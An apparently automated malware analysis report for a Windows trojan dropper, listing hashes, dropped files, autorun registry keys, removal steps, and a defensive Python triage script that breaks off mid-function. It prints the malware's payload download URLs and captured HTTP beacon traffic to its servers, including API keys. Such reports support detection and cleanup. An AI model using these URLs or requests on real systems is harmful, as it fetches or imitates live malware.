Gen.Variant.Barys.51615_81205d5bf3
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Barys.51615 (B) (Emsisoft), Gen:Variant.Barys.51615 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 81205d5bf3be7b9d013df0f0987ca8c7
SHA1: da61cc5c8fc31c78ab1ab72b476dd37012e90a5d
SHA256: 0c19811fb9c81dadede1e569e959f53d79d66ed59146a389b7529b7593cb916b
SSDeep: 6144:b0QB7Dq/zvX3wFm9un4jt1kHRmLzXX3pFarGTw:T0vwFmXRM
Size: 243200 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-25 19:19:01
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
SecondL.exe:3716
Sho9libi.exe:2880
%original file name%.exe:2604
OneTwo.exe:2360
The Trojan injects its code into the following process(es):
%original file name%.exe:3436
RHELWSD0F.exe:3836
r4ypgv5dbyy.exe:1972
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process SecondL.exe:3716 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe (204 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
The process Sho9libi.exe:2880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2880.344777 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2880.344777 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2880.344777 (0 bytes)
The process %original file name%.exe:3436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe (265666 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\OneTwo.exe (45140 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\SecondL.exe (1117 bytes)
The process OneTwo.exe:2360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\RHELWSD0FK\RHELWSD0F.exe (156158 bytes)
%Program Files%\RHELWSD0FK\uninstaller.exe (66836 bytes)
%Program Files%\RHELWSD0FK\uninstaller.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\RHELWSD0FK\RHELWSD0F.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2360.342390 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2360.342390 (0 bytes)
The process RHELWSD0F.exe:3836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\RHELWSD0FK\cast.config (36 bytes)
Registry activity
The process SecondL.exe:3716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process Sho9libi.exe:2880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
The process %original file name%.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASMANCS]
"EnableFileTracing" = "0"
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_UDDB6" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process OneTwo.exe:2360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process RHELWSD0F.exe:3836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"D27LIUGNVB52SJ3" = "%Program Files%\RHELWSD0FK\RHELWSD0F.exe"
The process r4ypgv5dbyy.exe:1972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"d3ydvryqdko" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 130d690f9f37a0a455d8ed3a54914cea | c:\Program Files\RHELWSD0FK\RHELWSD0F.exe |
| d6109f81634ff83fe1dd2d9ce1575762 | c:\Program Files\RHELWSD0FK\uninstaller.exe |
| 53a2efa3b8640fd38f8ebc91d2609f99 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\OneTwo.exe |
| 36fc263e8315ef086a9e9ae04192dbb9 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\SecondL.exe |
| 4c796c44d8ca098f90b6523a3c03614a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe |
| 10e7ab547686847964eb56910244e3e4 | c:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: VFK0BUH
Product Name:
Product Version: 7.1.7.6
Legal Copyright: Copyright (c) 6411
Legal Trademarks:
Original Filename: JijiLaPute.exe
Internal Name: JijiLaPute.exe
File Version: 7.1.7.6
File Description: VFK0BU
Comments: V
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 47108 | 47616 | 4.28813 | b99ef727936fff17c89b6d6106924c9a |
| .rsrc | 57344 | 194344 | 194560 | 3.79531 | 69bc05e286fa67d6b1d29bd6f6cee880 |
| .reloc | 253952 | 12 | 512 | 0.042395 | 6192891b82d91a777dbf5e9b1b3ce60e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe | |
| hxxp://bratitlamio.com/3/000000/wizzcaster_installer_v2.exe | |
| hxxp://bratitlamio.com/exe/updater.exe | |
| hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe | |
| hxxp://bratitlamio.com/download/3/wizzcaster_v2.exe | |
| hxxp://bratitlamio.com/download/3/wizzcaster_uninstaller_v2.exe | |
| hxxp://agent.wizztrakys.com/api/v5/config | |
| hxxp://agent.wizztrakys.com/api/v5/link | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://thegrandemanager.com/remotes_xml_sections.php | |
| hxxp://ladomainadeserver.com/api/v5/link | |
| hxxp://ladomainadeserver.com/api/v5/config | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:46 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:48 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: thegrandemanager.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:39 GMT
Server: Apache
Set-Cookie: PHPSESSID=8nfm55a3sr508vblu58t2etqi0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:53:57 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=8l63rijr6t2n62od3jav7p76c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:53:57 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESS
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:46 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:42 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:42 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
GET /exe/updater.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:43 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< skipped >>>
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:48 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=ac4d38bd35719a3740693940c7873e1dd90854f4; expires=Mon, 04-Sep-2017 00:52:48 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Sun, 03 Sep 2017 22:52:49 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=2c76bac47bc16101c5a351b027b2208a7324a172; expires=Mon, 04-Sep-2017 00:52:49 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}
The Trojan connects to the servers at the following location(s):
iexplore.exe_1296:
.text
.data
.rsrc
.reloc
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Shell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
SecondL.exe:3716
Sho9libi.exe:2880
%original file name%.exe:2604
OneTwo.exe:2360
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe (265666 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe.config (1 bytes)
C:\config.conf (47 bytes)
%Program Files%\RHELWSD0FK\RHELWSD0F.exe (156158 bytes)
%Program Files%\RHELWSD0FK\uninstaller.exe (66836 bytes)
%Program Files%\RHELWSD0FK\uninstaller.exe.config (1 bytes)
%Program Files%\RHELWSD0FK\RHELWSD0F.exe.config (1 bytes)
%Program Files%\RHELWSD0FK\cast.config (36 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_UDDB6" = "C:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"D27LIUGNVB52SJ3" = "%Program Files%\RHELWSD0FK\RHELWSD0F.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"d3ydvryqdko" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
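Before following the manual steps, a practitioner would want to confirm which of the listed artifacts are actually on the host, because the PIDs above are from the sandbox run and the autorun values point at per-host paths. The Python below is an added example (not part of the page or any vendor tool) that triages a Windows host for the autorun values, dropped files and process names this report lists; it reports and does not kill or delete anything. It assumes the report's "C:\Users\%CurrentUserName%\AppData\Roaming" and "AppData\Local\Temp" paths map to %APPDATA% and %TEMP%, and "%Program Files%" to %ProgramFiles%; those mappings and all function names are this example's own. The `CONFIG\*.cch.new` files under the .NET Framework directory are deliberately left out of the file list: they are the .NET 2.0 runtime's cache of its CAS policy files, which any .NET 2.0 process can regenerate, so their presence says nothing about infection. Matching is kept as pure functions so it can be exercised off-host; the collection functions use `winreg` and `tasklist` and only run on Windows.

```python
"""Host triage for the artifacts in the manual-removal steps above.

Added example for this report, not part of the page or any vendor tool.
Registry values, paths and process names come from the report; the
placeholder mapping (%CurrentUserName% paths -> %APPDATA% / %TEMP%,
"%Program Files%" -> %ProgramFiles%) and all function names are this
example's assumptions. Report-only: nothing is killed or deleted.
"""
import os
import re
import sys

# (hive, key, value name) of the autorun entries listed in the report.
REPORTED_AUTORUNS = [
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", "OMEWPRODUCT_UDDB6"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run", "D27LIUGNVB52SJ3"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run", "d3ydvryqdko"),
]

# Dropped files from the report. The .NET CONFIG\*.cch.new entries are left
# out: they are the runtime's own CAS policy cache, not planted by the droppers.
REPORTED_FILES = [
    r"%APPDATA%\13pqxsz543f\r4ypgv5dbyy.exe",
    r"%APPDATA%\13pqxsz543f\r4ypgv5dbyy.exe.config",
    r"%TEMP%\UHAS7BTKCT\SecondL.exe.config",
    r"%TEMP%\UHAS7BTKCT\OneTwo.exe.config",
    r"%TEMP%\UHAS7BTKCT\Sho9libi.exe",
    r"%TEMP%\UHAS7BTKCT\Sho9libi.exe.config",
    r"C:\config.conf",
    r"%ProgramFiles%\RHELWSD0FK\RHELWSD0F.exe",
    r"%ProgramFiles%\RHELWSD0FK\uninstaller.exe",
    r"%ProgramFiles%\RHELWSD0FK\uninstaller.exe.config",
    r"%ProgramFiles%\RHELWSD0FK\RHELWSD0F.exe.config",
    r"%ProgramFiles%\RHELWSD0FK\cast.config",
]

# Image names to terminate. Sandbox PIDs will not match a live host, so
# matching is on the name only.
REPORTED_PROCESSES = {"SecondL.exe", "Sho9libi.exe", "OneTwo.exe",
                      "RHELWSD0F.exe", "r4ypgv5dbyy.exe"}


def expand_reported_paths(env=None):
    """Expand %VAR% placeholders from `env` (default os.environ)."""
    env = os.environ if env is None else env
    return [re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1), m.group(0)), p)
            for p in REPORTED_FILES]


def match_autoruns(observed):
    """`observed`: (hive, key, value name, data) tuples read from the registry.
    Returns the reported entries that are present with their current data, so
    the analyst sees what the value points at on this host."""
    wanted = {(h.upper(), k.lower(), v.lower()) for h, k, v in REPORTED_AUTORUNS}
    return [{"hive": h, "key": k, "name": n, "data": d}
            for h, k, n, d in observed if (h.upper(), k.lower(), n.lower()) in wanted]


def match_files(paths, exists=os.path.exists):
    """Return the expanded paths that exist; `exists` is injectable for tests."""
    return [p for p in paths if exists(p)]


def match_processes(running):
    """`running`: (pid, image name) pairs. Case-insensitive match on the name."""
    wanted = {n.lower() for n in REPORTED_PROCESSES}
    return [(pid, name) for pid, name in running if name.lower() in wanted]


def collect_autoruns_windows():
    import winreg  # Windows only
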